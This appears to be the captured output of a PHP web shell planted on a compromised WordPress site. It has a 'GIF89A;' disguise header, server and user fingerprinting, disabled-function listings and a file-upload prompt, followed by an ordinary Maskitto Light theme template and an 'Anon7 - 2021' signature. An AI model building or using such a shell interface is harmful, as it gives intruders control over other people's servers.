GIF89A; .
KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Microsoft-IIS/10.0
System : Windows NT HMW9050 6.2 build 9200 (Unknow Windows version Standard Edition) i586
User : fatorc ( 0)
PHP Version : 5.3.28
Disable Function : escapeshellarg, escapeshellcmd, exec, passthru, proc_close, proc_open, shell_exec, system, dl, popen, php_check_syntax, php_strip_whitespace, symlink, link, openlog, apache_child_terminate
Directory :  e:/home/fatorc/Web/wp-content/themes/maskitto-light/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : e:/home/fatorc/Web/wp-content/themes/maskitto-light/page.php
<?php
/**
 * The template for displaying all pages.
 *
 * @package Maskitto Light
 */

$maskitto_light;
get_header(); ?>

	<?php while ( have_posts() ) : the_post();

			if( function_exists('is_bbpress') && is_bbpress() ) : ?>
				<div class="container" style="padding: 45px 0;">
					<?php echo the_content(); ?>
				</div>
			<?php else :
				$comments = get_post_meta( get_the_ID(), 'wpcf-comments', true );
		        echo maskitto_light_generate_page( get_the_ID() );
		        wp_reset_postdata();

				echo maskitto_light_get_widgets( get_the_content() );
			endif;

		?>

		<?php if( isset($comments) && $comments == 1 ) : ?>
			<div class="page-section" style="padding: 50px 0!important;">
				<div class="container page-list">
					<?php if( !isset($maskitto_light['blog-layout']) || $maskitto_light['blog-layout'] == 1 ) : ?>
						<div class="blog-layout-2">
					<?php endif; ?>

						<?php
							wp_reset_postdata();
							if ( comments_open() || get_comments_number() ) :
								comments_template();
							endif;
						?>

					<?php if( !isset($maskitto_light['blog-layout']) || $maskitto_light['blog-layout'] == 1 ) : ?>
						</div>
					<?php endif; ?>
				</div>
			</div>
		<?php endif; ?>

	<?php endwhile; ?>
<?php get_footer(); ?>

Anon7 - 2021